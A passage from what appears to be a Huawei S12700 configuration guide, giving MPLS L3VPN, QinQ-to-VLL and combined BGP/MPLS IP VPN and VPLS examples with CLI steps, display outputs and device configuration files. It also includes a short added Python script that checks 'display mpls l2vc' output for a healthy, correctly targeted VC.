#
mpls lsr-id 1.1.1.9
mpls
#
mpls ldp
#
interface Vlanif10
ip binding vpn-instance vpna
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif100
ip address 172.10.1.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 100
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100
peer 2.2.2.9 as-number 100
peer 2.2.2.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 2.2.2.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 2.2.2.9 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 192.168.1.2 as-number 65410
#
ospf 1
area 0.0.0.0
network 1.1.1.9 0.0.0.0
network 172.10.1.0 0.0.0.255
#
route-policy vpnroute permit node 1
if-match ip-prefix ipPrefix1
apply extcommunity rt 222:1
#
ip ip-prefix ipPrefix1 index 10 permit 192.168.1.0 24 greater-equal 24 less-equal 32
#
return


l Configuration file of PE2
#
sysname PE2
#
vlan batch 10 100
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 200:1
export route-policy vpnroute
vpn-target 222:1 export-extcommunity
vpn-target 222:1 import-extcommunity
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif10
ip binding vpn-instance vpna
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif100
ip address 172.10.1.2 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 100
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
bgp 100
peer 1.1.1.9 as-number 100
peer 1.1.1.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 192.168.2.2 as-number 65420
#
ospf 1
area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 172.10.1.0 0.0.0.255
#
route-policy vpnroute permit node 1
if-match ip-prefix ipPrefix1
apply extcommunity rt 111:1
#
ip ip-prefix ipPrefix1 index 10 permit 192.168.2.0 24 greater-equal 24 less-equal 32
#
return

l Configuration file of CE1


#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
bgp 65410
peer 192.168.1.1 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 192.168.1.1 enable
#
return

l Configuration file of CE2
#
sysname CE2
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.2.2 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
bgp 65420
peer 192.168.2.1 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 192.168.2.1 enable
#
return

14.2 Example for Connecting QinQ Termination Sub-interfaces to a VLL Network
Overview
As a point-to-point (P2P) Layer 2 tunneling technology based on MPLS, VLL transparently
transmits Layer 2 data packets over the MPLS backbone network, so that geographically
isolated sites that belong to the same VLAN can communicate with each other.

After QinQ termination sub-interfaces are connected to a VLL network, the sub-interfaces on
devices terminate double VLAN tags before sending the packets to the VLL network.

QinQ termination sub-interfaces apply to scenarios where all the VLANs (such as VLAN 100
to VLAN 200) of one site need to communicate with a remote site over the VLL network or
VLAN resources of the public network need to be saved. In these scenarios, the switching
device deployed between the CE and PE devices adds the same outer VLAN tag to packets
carrying different inner VLAN tags from different CE devices. The sub-interface on the PE


device then terminates double VLAN tags in QinQ packets and sends the packets to the VLL
tunnel.

QinQ is an extension to MAN Ethernet VPN on the core VLL network. It can form an end-to-
end VPN solution to implement Layer 2 communication between geographically isolated
users.

Configuration Notes
l This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 14-6, CE1 and CE2 are connected to PE1 and PE2 respectively through
VLANs.

A Martini VLL is set up between CE1 and CE2.

Switch1 is connected to CE1 and PE1.

Switch2 is connected to CE2 and PE2.

You are required to configure selective QinQ on the interfaces connected to CEs so that the
Switch adds the VLAN tags specified by the carrier to the packets sent from CEs.

When the Switch is connected to multiple CEs, the Switch can add the same VLAN tag to the
packets from different CEs, thereby saving VLAN IDs on the public network.

Figure 14-6 Networking diagram for connecting QinQ termination sub-interfaces to a VLL network
(Topology: CE1 - Switch1 - PE1 - P - PE2 - Switch2 - CE2; Loopback1 addresses 1.1.1.1/32 on PE1,
2.2.2.2/32 on P and 3.3.3.3/32 on PE2)

Switch Interface VLANIF Interface IP Address
PE1 GigabitEthernet1/0/0 GigabitEthernet1/0/0.1 -
PE1 GigabitEthernet2/0/0 VLANIF20 10.1.1.1/24
PE1 Loopback1 - 1.1.1.1/32
PE2 GigabitEthernet1/0/0 VLANIF30 10.2.2.1/24
PE2 GigabitEthernet2/0/0 GigabitEthernet2/0/0.1 -
PE2 Loopback1 - 3.3.3.3/32
P GigabitEthernet1/0/0 VLANIF30 10.2.2.2/24
P GigabitEthernet2/0/0 VLANIF20 10.1.1.2/24
P Loopback1 - 2.2.2.2/32
CE1 GigabitEthernet1/0/0 VLANIF10 10.10.10.1/24
CE2 GigabitEthernet1/0/0 VLANIF10 10.10.10.2/24

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure a routing protocol on devices (PE and P) of the backbone network to
implement interworking, and enable MPLS.
2. Use the default tunnel policy to create an LSP and configure the LSP for data
transmission.
3. Enable MPLS L2VPN and create VC connections on PEs.
4. Configure QinQ termination sub-interfaces on PE interfaces connected to the switches to
implement VLL access.
5. Configure selective QinQ on the switch interfaces connected to CEs.

Procedure
Step 1 Configure the VLANs to which interfaces of CEs, PEs, and P belong and assign IP addresses
to VLANIF interfaces according to Figure 14-6.
# Configure CE1 to ensure that packets sent from CE1 to Switch1 carry a single VLAN tag.
<HUAWEI> system-view
[HUAWEI] sysname CE1
[CE1] vlan batch 10
[CE1] interface gigabitethernet 1/0/0
[CE1-GigabitEthernet1/0/0] port link-type trunk
[CE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[CE1-GigabitEthernet1/0/0] quit
[CE1] interface vlanif 10
[CE1-Vlanif10] ip address 10.10.10.1 24
[CE1-Vlanif10] quit

# Configure CE2 to ensure that packets sent from CE2 to Switch2 carry a single VLAN tag.
<HUAWEI> system-view
[HUAWEI] sysname CE2
[CE2] vlan batch 10
[CE2] interface gigabitethernet 1/0/0
[CE2-GigabitEthernet1/0/0] port link-type trunk
[CE2-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[CE2-GigabitEthernet1/0/0] quit
[CE2] interface vlanif 10
[CE2-Vlanif10] ip address 10.10.10.2 24
[CE2-Vlanif10] quit

# Configure PE1.
<HUAWEI> system-view
[HUAWEI] sysname PE1


[PE1] vlan batch 20
[PE1] interface gigabitethernet 2/0/0
[PE1-GigabitEthernet2/0/0] port link-type hybrid
[PE1-GigabitEthernet2/0/0] port hybrid pvid vlan 20
[PE1-GigabitEthernet2/0/0] port hybrid tagged vlan 20
[PE1-GigabitEthernet2/0/0] quit
[PE1] interface vlanif 20
[PE1-Vlanif20] ip address 10.1.1.1 24
[PE1-Vlanif20] quit

# Configure the P.
<HUAWEI> system-view
[HUAWEI] sysname P
[P] vlan batch 20 30
[P] interface gigabitethernet 1/0/0
[P-GigabitEthernet1/0/0] port link-type hybrid
[P-GigabitEthernet1/0/0] port hybrid pvid vlan 30
[P-GigabitEthernet1/0/0] port hybrid tagged vlan 30
[P-GigabitEthernet1/0/0] quit
[P] interface gigabitethernet 2/0/0
[P-GigabitEthernet2/0/0] port link-type hybrid
[P-GigabitEthernet2/0/0] port hybrid pvid vlan 20
[P-GigabitEthernet2/0/0] port hybrid tagged vlan 20
[P-GigabitEthernet2/0/0] quit
[P] interface vlanif 20
[P-Vlanif20] ip address 10.1.1.2 24
[P-Vlanif20] quit
[P] interface vlanif 30
[P-Vlanif30] ip address 10.2.2.2 24
[P-Vlanif30] quit

# Configure PE2.
<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] vlan batch 30
[PE2] interface gigabitethernet 1/0/0
[PE2-GigabitEthernet1/0/0] port link-type hybrid
[PE2-GigabitEthernet1/0/0] port hybrid pvid vlan 30
[PE2-GigabitEthernet1/0/0] port hybrid tagged vlan 30
[PE2-GigabitEthernet1/0/0] quit
[PE2] interface vlanif 30
[PE2-Vlanif30] ip address 10.2.2.1 24
[PE2-Vlanif30] quit

Step 2 Configure selective QinQ on interfaces of the Switch and specify the VLANs allowed by the
interfaces.
# Configure Switch1.
<HUAWEI> system-view
[HUAWEI] sysname Switch1
[Switch1] vlan 100
[Switch1-vlan100] quit
[Switch1] interface gigabitethernet2/0/0
[Switch1-GigabitEthernet2/0/0] port link-type hybrid
[Switch1-GigabitEthernet2/0/0] port hybrid tagged vlan 100
[Switch1-GigabitEthernet2/0/0] quit
[Switch1] interface gigabitethernet1/0/0
[Switch1-GigabitEthernet1/0/0] port link-type hybrid
[Switch1-GigabitEthernet1/0/0] port hybrid untagged vlan 100
[Switch1-GigabitEthernet1/0/0] port vlan-stacking vlan 10 stack-vlan 100 //On a fixed switch, first run the qinq vlan-translation enable command to enable VLAN translation.
[Switch1-GigabitEthernet1/0/0] quit

# Configure Switch2.
<HUAWEI> system-view
[HUAWEI] sysname Switch2


[Switch2] vlan 100
[Switch2-vlan100] quit
[Switch2] interface gigabitethernet2/0/0
[Switch2-GigabitEthernet2/0/0] port link-type hybrid
[Switch2-GigabitEthernet2/0/0] port hybrid tagged vlan 100
[Switch2-GigabitEthernet2/0/0] quit
[Switch2] interface gigabitethernet1/0/0
[Switch2-GigabitEthernet1/0/0] port link-type hybrid
[Switch2-GigabitEthernet1/0/0] port hybrid untagged vlan 100
[Switch2-GigabitEthernet1/0/0] port vlan-stacking vlan 10 stack-vlan 100 //On a fixed switch, first run the qinq vlan-translation enable command to enable VLAN translation.
[Switch2-GigabitEthernet1/0/0] quit

Step 3 Configure an IGP on the MPLS backbone network. OSPF is used as an example.
Configure PE1, P, and PE2 to advertise 32-bit loopback interface addresses as the LSR IDs.
# Configure PE1.
[PE1] router id 1.1.1.1
[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.1 32
[PE1-LoopBack1] quit
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.1 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] network 10.1.1.1 0.0.0.255
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

# Configure the P.
[P] router id 2.2.2.2
[P] interface loopback 1
[P-LoopBack1] ip address 2.2.2.2 32
[P-LoopBack1] quit
[P] ospf 1
[P-ospf-1] area 0
[P-ospf-1-area-0.0.0.0] network 2.2.2.2 0.0.0.0
[P-ospf-1-area-0.0.0.0] network 10.1.1.2 0.0.0.255
[P-ospf-1-area-0.0.0.0] network 10.2.2.2 0.0.0.255
[P-ospf-1-area-0.0.0.0] quit
[P-ospf-1] quit

# Configure PE2.
[PE2] router id 3.3.3.3
[PE2] interface loopback 1
[PE2-LoopBack1] ip address 3.3.3.3 32
[PE2-LoopBack1] quit
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1-area-0.0.0.0] network 3.3.3.3 0.0.0.0
[PE2-ospf-1-area-0.0.0.0] network 10.2.2.1 0.0.0.255
[PE2-ospf-1-area-0.0.0.0] quit
[PE2-ospf-1] quit

# After the configuration is complete, PE1, P, and PE2 can establish OSPF neighbor relationships. Run the display ospf peer command: the OSPF neighbor relationship status is Full. Run the display ip routing-table command: the PEs have learned the route to each other's Loopback1 interface. The display on PE1 is used as an example:
[PE1] display ospf peer

OSPF Process 1 with Router ID 1.1.1.1


Neighbors

Area 0.0.0.0 interface 10.1.1.1(Vlanif20)'s neighbors
Router ID: 2.2.2.2 Address: 10.1.1.2
State: Full Mode:Nbr is Master Priority: 1
DR: 10.1.1.2 BDR: 10.1.1.1 MTU: 0
Dead timer due in 34 sec
Retrans timer interval: 5
Neighbor is up for 00:01:16
Authentication Sequence: [ 0 ]
[PE1] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 8 Routes : 8

Destination/Mask Proto Pre Cost Flags NextHop Interface

1.1.1.1/32 Direct 0 0 D 127.0.0.1 LoopBack1
2.2.2.2/32 OSPF 10 1 D 10.1.1.2 Vlanif20
3.3.3.3/32 OSPF 10 2 D 10.1.1.2 Vlanif20
10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif20
10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
10.2.2.0/24 OSPF 10 2 D 10.1.1.2 Vlanif20
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0

Step 4 Enable basic MPLS functions and MPLS LDP on the MPLS backbone network.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.1
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1] interface vlanif 20
[PE1-Vlanif20] mpls
[PE1-Vlanif20] mpls ldp
[PE1-Vlanif20] quit

# Configure the P.
[P] mpls lsr-id 2.2.2.2
[P] mpls
[P-mpls] quit
[P] mpls ldp
[P-mpls-ldp] quit
[P] interface vlanif 20
[P-Vlanif20] mpls
[P-Vlanif20] mpls ldp
[P-Vlanif20] quit
[P] interface vlanif 30
[P-Vlanif30] mpls
[P-Vlanif30] mpls ldp
[P-Vlanif30] quit

# Configure PE2.
[PE2] mpls lsr-id 3.3.3.3
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2] interface vlanif 30
[PE2-Vlanif30] mpls
[PE2-Vlanif30] mpls ldp
[PE2-Vlanif30] quit

Step 5 Set up a remote LDP session between PEs.
# Configure PE1.
[PE1] mpls ldp remote-peer 3.3.3.3
[PE1-mpls-ldp-remote-3.3.3.3] remote-ip 3.3.3.3
[PE1-mpls-ldp-remote-3.3.3.3] quit

# Configure PE2.
[PE2] mpls ldp remote-peer 1.1.1.1
[PE2-mpls-ldp-remote-1.1.1.1] remote-ip 1.1.1.1
[PE2-mpls-ldp-remote-1.1.1.1] quit

After the configuration is complete, run the display mpls ldp session command on PE1 to
view the LDP session setup. You can see that an LDP session is set up between PE1 and PE2.
The display on PE1 is used as an example:
[PE1] display mpls ldp session

LDP Session(s) in Public Network
Codes: LAM(Label Advertisement Mode), SsnAge Unit(DDDD:HH:MM)
A '*' before a session means the session is being deleted.
------------------------------------------------------------------------------
PeerID Status LAM SsnRole SsnAge KASent/Rcv
------------------------------------------------------------------------------
2.2.2.2:0 Operational DU Passive 0000:15:29 3717/3717
3.3.3.3:0 Operational DU Passive 0000:00:00 2/2
------------------------------------------------------------------------------
TOTAL: 2 session(s) Found.

Step 6 Enable MPLS L2VPN on PEs and set up VC connections.
# On PE1, create a VC connection on gigabitethernet1/0/0.1 connected to Switch1.
[PE1] mpls l2vpn
[PE1-l2vpn] quit
[PE1] interface gigabitethernet1/0/0
[PE1-GigabitEthernet1/0/0] port link-type hybrid
[PE1-GigabitEthernet1/0/0] quit
[PE1] interface gigabitethernet1/0/0.1
[PE1-GigabitEthernet1/0/0.1] qinq termination pe-vid 100 ce-vid 10
[PE1-GigabitEthernet1/0/0.1] mpls l2vc 3.3.3.3 101
[PE1-GigabitEthernet1/0/0.1] quit

# On PE2, create a VC connection on gigabitethernet2/0/0.1 connected to Switch2.
[PE2] mpls l2vpn
[PE2-l2vpn] quit
[PE2] interface gigabitethernet2/0/0
[PE2-GigabitEthernet2/0/0] port link-type hybrid
[PE2-GigabitEthernet2/0/0] quit
[PE2] interface gigabitethernet2/0/0.1
[PE2-GigabitEthernet2/0/0.1] qinq termination pe-vid 100 ce-vid 10
[PE2-GigabitEthernet2/0/0.1] mpls l2vc 1.1.1.1 101
[PE2-GigabitEthernet2/0/0.1] quit

Step 7 Verify the configuration.
Check the L2VPN connections on PEs. You can see that an L2VC connection has been set up
and is in Up state.
The display on PE1 is used as an example:
[PE1] display mpls l2vc interface gigabitethernet1/0/0.1
*client interface : GigabitEthernet1/0/0.1 is up
Administrator PW : no
session state : up
AC status : up
VC state : up
Label state : 0
Token state : 0
VC ID : 101
VC type : VLAN
destination : 3.3.3.3
local group ID : 0 remote group ID : 0
local VC label : 23552 remote VC label : 23552
local AC OAM State : up
local PSN OAM State : up
local forwarding state : forwarding
local status code : 0x0
remote AC OAM state : up
remote PSN OAM state : up
remote forwarding state: forwarding
remote status code : 0x0
ignore standby state : no
BFD for PW : unavailable
VCCV State : up
manual fault : not set
active state : active
forwarding entry : exist
link state : up
local VC MTU : 1500 remote VC MTU : 1500
local VCCV : alert ttl lsp-ping bfd
remote VCCV : alert ttl lsp-ping bfd
local control word : disable remote control word : disable
tunnel policy name : --
PW template name : --
primary or secondary : primary
load balance type : flow
Access-port : false
Switchover Flag : false
VC tunnel/token info : 1 tunnels/tokens
NO.0 TNL type : lsp , TNL ID : 0x10031
Backup TNL type : lsp , TNL ID : 0x0
create time : 1 days, 22 hours, 15 minutes, 9 seconds
up time : 0 days, 22 hours, 54 minutes, 57 seconds
last change time : 0 days, 22 hours, 54 minutes, 57 seconds
VC last up time : 2010/10/09 19:26:37
VC total up time : 1 days, 20 hours, 42 minutes, 30 seconds
CKey : 8
NKey : 3
PW redundancy mode : --
AdminPw interface : --
AdminPw link state : --
Diffserv Mode : uniform
Service Class : --
Color : --
DomainId : --
Domain Name : --
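As an added example, not Huawei code, a Python checker for the output above: it parses the key : value lines, including the one-line local/remote pairs, and verifies that the VC is up end to end and is the VC configured with mpls l2vc 3.3.3.3 101 rather than one cross-connected to another peer. The first sample is copied from the output above; the second is a constructed variant with two fields altered.

```python
"""Checker for the 'display mpls l2vc interface ...' output shown on this page.
Added example, not Huawei code.  It parses the 'key : value' lines (including
the one-line local/remote pairs) and verifies that the VC is fully up and is the
VC that was configured with 'mpls l2vc <peer> <vc-id>'."""
import re
from typing import Dict, List

# One-line local/remote pairs, e.g. "local VC label : 23552 remote VC label : 23552"
_PAIR = re.compile(r"^(local .*?)\s*:\s+(.*?)\s+(remote .*?)\s*:\s+(.*)$")
# Any other "key : value" line; the separator may lack the space before ':'
# (the page shows "remote forwarding state: forwarding").
_KV = re.compile(r"^(.*?)\s*:\s+(.*)$")


def parse_l2vc(text: str) -> Dict[str, str]:
    """Turn the display output into a dict.  The '*' marker before
    'client interface' is dropped; pair lines contribute two keys."""
    fields: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("*").strip()
        m = _PAIR.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
            fields[m.group(3).strip()] = m.group(4).strip()
            continue
        m = _KV.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def check_l2vc(fields: Dict[str, str], vc_id: str, peer: str) -> List[str]:
    """Return the list of problems found; empty means healthy.

    Besides the up/forwarding states, the VC ID and destination are compared
    with the configured values: a VC that is up but terminates on the wrong
    remote PE would deliver this customer's Layer 2 traffic to another site.
    """
    expected = {
        "VC ID": vc_id, "destination": peer,
        "session state": "up", "AC status": "up", "VC state": "up",
        "local forwarding state": "forwarding",
        "remote forwarding state": "forwarding",
        "local AC OAM State": "up", "local PSN OAM State": "up",
        "remote AC OAM state": "up", "remote PSN OAM state": "up",
    }
    problems = [f"{key}: expected {want!r}, got {fields.get(key)!r}"
                for key, want in expected.items() if fields.get(key) != want]
    # The two ends must agree on MTU and control word for the PW to stay up.
    for a, b in (("local VC MTU", "remote VC MTU"),
                 ("local control word", "remote control word")):
        if fields.get(a) != fields.get(b):
            problems.append(f"{a} {fields.get(a)!r} != {b} {fields.get(b)!r}")
    return problems


# Constructed sample: the relevant lines of the PE1 output shown on this page.
SAMPLE_UP = """\
*client interface : GigabitEthernet1/0/0.1 is up
Administrator PW : no
session state : up
AC status : up
VC state : up
VC ID : 101
VC type : VLAN
destination : 3.3.3.3
local group ID : 0 remote group ID : 0
local VC label : 23552 remote VC label : 23552
local AC OAM State : up
local PSN OAM State : up
local forwarding state : forwarding
remote AC OAM state : up
remote PSN OAM state : up
remote forwarding state: forwarding
VCCV State : up
local VC MTU : 1500 remote VC MTU : 1500
local control word : disable remote control word : disable
NO.0 TNL type : lsp , TNL ID : 0x10031
"""
# Constructed variant: the VC is down and the remote end advertises another MTU.
SAMPLE_BROKEN = (SAMPLE_UP.replace("VC state : up", "VC state : down")
                 .replace("remote VC MTU : 1500", "remote VC MTU : 9000"))

if __name__ == "__main__":
    print(check_l2vc(parse_l2vc(SAMPLE_UP), "101", "3.3.3.3"))
    print(check_l2vc(parse_l2vc(SAMPLE_BROKEN), "101", "3.3.3.3"))
```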

CE1 and CE2 can ping each other. The display on CE1 is used as an example:
[CE1] ping 10.10.10.2
PING 10.10.10.2: 56 data bytes, press CTRL_C to break
Reply from 10.10.10.2: bytes=56 Sequence=1 ttl=255 time=31 ms
Reply from 10.10.10.2: bytes=56 Sequence=2 ttl=255 time=10 ms
Reply from 10.10.10.2: bytes=56 Sequence=3 ttl=255 time=5 ms
Reply from 10.10.10.2: bytes=56 Sequence=4 ttl=255 time=2 ms
Reply from 10.10.10.2: bytes=56 Sequence=5 ttl=255 time=28 ms

--- 10.10.10.2 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 2/15/31 ms

----End

Configuration Files
l Configuration file of CE1
#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 10.10.10.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
return

l Configuration file of Switch1
#
sysname Switch1
#
vlan batch 100
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid untagged vlan 100
port vlan-stacking vlan 10 stack-vlan 100
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid tagged vlan 100
#
return

l Configuration file of PE1
#
sysname PE1
#
router id 1.1.1.1
#
vlan batch 20
#
mpls lsr-id 1.1.1.1
mpls
#
mpls l2vpn
#
mpls ldp
#
mpls ldp remote-peer 3.3.3.3
remote-ip 3.3.3.3
#
interface Vlanif20
ip address 10.1.1.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type hybrid
#
interface GigabitEthernet1/0/0.1
qinq termination pe-vid 100 ce-vid 10
mpls l2vc 3.3.3.3 101
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid pvid vlan 20
port hybrid tagged vlan 20
#
interface LoopBack1
ip address 1.1.1.1 255.255.255.255
#
ospf 1
area 0.0.0.0
network 1.1.1.1 0.0.0.0
network 10.1.1.0 0.0.0.255
#
return
l Configuration file of the P
#
sysname P
#
router id 2.2.2.2
#
vlan batch 20 30
#
mpls lsr-id 2.2.2.2
mpls
#
mpls ldp
#
interface Vlanif20
ip address 10.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif30
ip address 10.2.2.2 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid pvid vlan 30
port hybrid tagged vlan 30
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid pvid vlan 20
port hybrid tagged vlan 20
#
interface LoopBack1
ip address 2.2.2.2 255.255.255.255
#
ospf 1
area 0.0.0.0
network 2.2.2.2 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.2.2.0 0.0.0.255
#
return
l Configuration file of PE2
#
sysname PE2
#
router id 3.3.3.3
#
vlan batch 30
#
mpls lsr-id 3.3.3.3
mpls
#
mpls l2vpn
#
mpls ldp
#
mpls ldp remote-peer 1.1.1.1
remote-ip 1.1.1.1
#
interface Vlanif30
ip address 10.2.2.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid pvid vlan 30
port hybrid tagged vlan 30
#
interface GigabitEthernet2/0/0
port link-type hybrid
#
interface GigabitEthernet2/0/0.1
qinq termination pe-vid 100 ce-vid 10
mpls l2vc 1.1.1.1 101
#
interface LoopBack1
ip address 3.3.3.3 255.255.255.255
#
ospf 1
area 0.0.0.0
network 3.3.3.3 0.0.0.0
network 10.2.2.0 0.0.0.255
#
return

l Configuration file of Switch2
#
sysname Switch2
#
vlan batch 100
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid untagged vlan 100
port vlan-stacking vlan 10 stack-vlan 100
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid tagged vlan 100
#
return

l Configuration file of CE2
#
sysname CE2
#
vlan batch 10
#
interface Vlanif10
ip address 10.10.10.2 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
return

14.3 Example for Deploying BGP/MPLS IP VPN and VPLS on One ISP Network
Overview
BGP/MPLS IP VPN is an MPLS-based L3VPN. It can be deployed flexibly and extended easily, which makes it suitable for large-scale deployment: when a new site is added, the network administrator only needs to modify the configuration of the edge nodes serving the new site. BGP/MPLS IP VPN is suitable for communication between the headquarters and branches in different locations. As communication data needs to traverse the backbone network of the ISP, BGP is used to advertise VPN routes and MPLS is used to forward VPN packets on the backbone network. As different departments of an enterprise need to be isolated, BGP/MPLS IP VPN provides route isolation, address space isolation, and access isolation between different VPNs.
VPLS integrates the advantages provided by Ethernet and MPLS. By emulating traditional
LAN functions, VPLS enables geographically isolated users on different Ethernet LANs to
communicate with each other over the IP/MPLS network provided by the ISP as if they were
on the same LAN.
As enterprises set up more and more branches in different regions and office flexibility
increases, applications such as instant messaging and teleconferencing are increasingly widely
used. This imposes high requirements for end-to-end (E2E) datacom technologies. Multiple
enterprise branches distributed in different regions need to communicate over the
metropolitan area network (MAN) provided by the ISP. Layer 2 service packets between
enterprise branches need to be transmitted over the MAN using the VPLS technology, so that
the enterprise branches in different regions can communicate with each other.
The ISP can use the same PE device to provide VPLS and L3VPN services for enterprises to
reduce the network construction costs.

Configuration Notes
l The SA series cards cannot be used in this example. The X1E series cards of V200R007
and later versions can be used in this example.
l This example applies to all versions of the S12700 switches.
NOTE
For details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 14-7:
l An ISP provides both VPLS and L3VPN services.
l CE1 connected to the headquarters of enterprise A and CE3 connected to a branch belong to the same VPLS to transmit Layer 2 services. CE1 and CE3 are bound to vpna to implement secure transmission of Layer 3 data.
l CE2 connected to the headquarters of enterprise B and CE4 connected to a branch belong to the same VPLS to transmit Layer 2 services. CE2 and CE4 are bound to vpnb to implement secure transmission of Layer 3 data.

l Selective QinQ needs to be configured on CE-side interfaces on switches to add outer VLAN tags specified by the ISP to the packets sent from CE devices. If a switch connects to multiple CE devices, it can add the same VLAN tag to packets from different CE devices. This saves VLAN IDs on the ISP network.

Figure 14-7 Networking for deploying BGP/MPLS IP VPN and VPLS on one ISP network

[Figure 14-7 image not reproducible in text. Labels recoverable from it: VPN backbone AS 100 with PE1 (Loopback1 1.1.1.9/32; GE3/0/0, VLANIF30 172.1.1.1/24), P (Loopback1 2.2.2.9/32; GE1/0/0, VLANIF30 172.1.1.2/24; GE2/0/0, VLANIF60 172.2.1.1/24) and PE2 (Loopback1 3.3.3.9/32; GE3/0/0, VLANIF60 172.2.1.2/24). CE1 (AS 65410, VLANIF10 10.1.1.1/24) and CE3 (AS 65430, VLANIF10 10.3.1.1/24) connect directly to PE1 GE1/0/0 and PE2 GE1/0/0 and belong to vpna and vsi1. CE2 (AS 65420, VLANIF20 10.2.1.1/24) and CE4 (AS 65440, VLANIF20 10.4.1.1/24) connect through Switch1 and Switch2 (GE1/0/0 toward the CE, GE2/0/0 toward the PE) to PE1 GE2/0/0 and PE2 GE2/0/0 and belong to vpnb and vsi2.]

Data Plan

Device  Interface             Sub-interface           IP Address
PE1     GigabitEthernet1/0/0  GigabitEthernet1/0/0.1  10.1.1.2/24
                              GigabitEthernet1/0/0.2  -
        GigabitEthernet2/0/0  GigabitEthernet2/0/0.1  10.2.1.2/24
                              GigabitEthernet2/0/0.2  -
PE2     GigabitEthernet1/0/0  GigabitEthernet1/0/0.1  10.3.1.2/24
                              GigabitEthernet1/0/0.2  -
        GigabitEthernet2/0/0  GigabitEthernet2/0/0.1  10.4.1.2/24
                              GigabitEthernet2/0/0.2  -

The .2 sub-interfaces carry no IP address; they are bound to VSIs at Layer 2.

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure OSPF between the P and PE devices to ensure IP connectivity on the
backbone network.
2. Enable basic MPLS capabilities and MPLS LDP on the P and PE devices to set up
MPLS LSP tunnels for VPN data transmission on the backbone network.
3. Configure MP-IBGP on PE1 and PE2 to enable them to exchange VPN routing
information.
4. Configure BGP/MPLS IP VPN. Configure L3VPN instances vpna and vpnb on PE1 and
PE2. Set the VPN target of vpna to 111:1 and the VPN target of vpnb to 222:2. This
configuration allows users in the same VPN to communicate with each other and isolates
users of different VPNs. Configure dot1q termination sub-interfaces for single-tagged
packets sent from CE1 and CE3. Configure QinQ termination sub-interfaces for double-
tagged packets sent from CE2 and CE4.
5. Configure the VPLS service. Create VPLS VSI instances on PE1 and PE2. In each VSI
instance, specify BGP as the signaling protocol, and set the RD, VPN target and site.
Bind sub-interfaces to VSI instances so that the sub-interfaces function as AC interfaces
to provide access for VPLS users. Configure dot1q termination sub-interfaces for single-
tagged packets sent from CE1 and CE3. Configure QinQ termination sub-interfaces for
double-tagged packets sent from CE2 and CE4.
6. Configure selective QinQ on CE-side interfaces of the switches and specify the VLANs
allowed by the interfaces.
